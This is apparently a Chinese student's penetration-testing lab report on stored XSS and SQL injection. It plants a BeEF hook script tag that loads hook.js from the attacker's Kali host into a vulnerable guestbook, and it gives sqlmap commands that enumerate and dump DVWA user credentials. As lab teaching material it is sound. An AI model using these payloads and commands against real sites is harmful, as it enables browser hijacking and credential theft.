Kali网络渗透测试实验三——XSS和SQL注入-爱代码爱编程
前言
实验目的
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
XSS部分:利用Beef劫持被攻击者客户端浏览器
实验环境搭建
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
使用win2003server_IIS服务搭建纯在XSS漏洞的网站
参考:Windows Server 2003安装IIS服务并配置WEB站点
具体实现:
首先将实验三文件夹中的GuestBook文件夹复制到win2003server虚拟机(在此之前要先安装VMtools),然后找到IIS(路径为 开始->程序->管理工具->IIS),在IIS里添加网站,设置好IP、权限和端口等(见上面参考链接)之后,要在Web服务扩展中将 Active Server Pages 设置为允许(不一定是默认允许的),否则无法打开网站,见下图:
Active Server Pages禁止情况下:
Active Server Pages允许情况下:
这个问题也是困扰了本人很久,分享出来希望可以帮助到大家。
到此实验环境搭建就结束啦,不清楚的话可以欢迎在评论区或者私信与本人交流~
1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞
利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图如下:
可以发现在erro.asp和add.asp里面都存在一个XSS漏洞:
2.Kali使用beef生成恶意代码
在kali里面打开beef
仿造上面的自己写一个:
<script src="http://Kali的ip:3000/hook.js"></script>
例如:
<script src="http://192.168.189.131:3000/hook.js"></script>
3.访问http://留言簿网站,将恶意代码写入网站留言板
在kali访问留言簿的网址留言:
那有的小伙伴可能就要问了,那为什么不直接在win2003的虚拟机上面留言呢?还得复制url到kali里面,多麻烦呀
原因:根据实际,正常来说,是无法直接使用开启网站服务的主机在自己的网站上留言恶意代码的,所以呀所以,在kali上面留言才更加实际一些嘛,听懂掌声~
留言完了记得在Firefox打开beef,账号密码默认都是beef(新版的好像不能直接使用默认账户密码,记得修改嗷)
然后在win2003这边查看留言并观察kali beef的变化:
可以看到好像多了一些东西(箭头所指),仔细一看,好家伙,好像是自己的……
之后再使用win10的物理机访问留言簿网站,然后再到kali beef里面查看变化:
确实是劫持到了自己的物理机……
在beef里可以查看到一些信息:
还可以指定劫持网站转为学校主页或者其他的网站(比如百度):
在beef内操作:
将劫持的网站转为百度:
物理机上浏览器的变化:
再试试转为学校主页叭:
物理机上面的变化:
这两个操作好像不能连续的进行,得在物理机上重新进一次留言网站才可以转到学校网站,不过还是很帅,有成功的惊艳到本小白哈哈
4.管理员登录login.htm,账号密码均为admin,审核用户留言
其实在上一步已经有啦,但是不能让标题空在这里,不然标题也会觉得孤独的。
5.回答问题
问题:实验中XSS攻击属于哪种类型?
答:本次实验中的XSS攻击属于存储型。
(转自:https://blog.csdn.net/qq_41783309/article/details/80615909)
SQL注入部分:DVWA+SQLmap+Mysql注入实战
sqlmap语法参考
1.注入点发现
要进行SQL注入,首先肯定是要判断是否有注入漏洞。在dvwa(搭建好Metasplotiable 2之后获取ip,在浏览器上访问ip,就可以找到啦)上先将DVWA Security的Script Security等级改为low,如下图,原因后面会补充嗷~
然后在 SQL Injecttion的User ID 输入栏输入1,返回正常,再输入 1’ ,注意多了个单引号,报错,返回You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
此时可以断定有SQL注入漏洞。
输入1’ 以及报错返回:
同时也可以得到url: http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
当然,还需要获取 cookie中的 PHPSESSID:在Firefox(google)中按F12,找到cookie,即可查看cookie,如下图:
接下来就可以进行SQL注入啦~
2.枚举当前使用的数据库名称和用户名
输入的命令:
sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -b --current-db --current-user
sqlmap输出:
3.枚举数据库用户名和密码
输入的命令:
sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --users --password
sqlmap输出:
4.枚举数据库
输入的命令:
sqlmap -u "Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --dbs
sqlmap输出:
5.枚举数据库和指定数据库的数据表
输入的命令:
sqlmap -u “Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -D dvwa --tables
sqlmap输出:
6.获取指定数据库和表中所有列的信息
输入的命令:
sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --string=“Surname” -D dvwa -T users --columns
sqlmap输出:
7.枚举指定数据表中的所有用户名与密码,并down到本地
输入的命令:
sqlmap -u “http://125.217.53.8/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -D dvwa -T users -C user,password --dump
sqlmap输出:
在此可以看到数据表中的所有用户名和密码以及down到本地的csv文件路径。
Tips:
带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。
查看本地的users.csv
可以此新建一个终端窗口,然后 cd 到dvwa文件夹,输入命令: ls -a ,可以查看当前文件夹包含的文件(包括隐藏文件),如下图:
然后输入命令 cat users.csv,就可以查看down本地的用户名和密码啦~
总结
这次的实验对我来说确实是有一些难度,不过好在社团的学习环境很棒,总是有大佬救我于水深火热之中,让我得以成功完成实验,在此感谢一波大佬们的帮助。
写的是实验报告,就不能像之前自己写的博客那样口水话一堆又一堆,可能看起来就没有那么好玩儿~ 也希望小榆不要觉得无聊哇。以后也会写出不枯燥又有内容的文章的,用心分享自己学到的东西。
每次写网络渗透测试实验总能感觉到自己很菜,发现又有很多东西不会,但是对自己狠一些总是能写完的,毕竟没有困难的工作,只有勇敢的打工人。
好啦,本篇文章到这里就结束啦,希望大家看完都能有所收获,有问题的话欢迎在评论区指正喔~
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/qq_45746876/article/details/110069299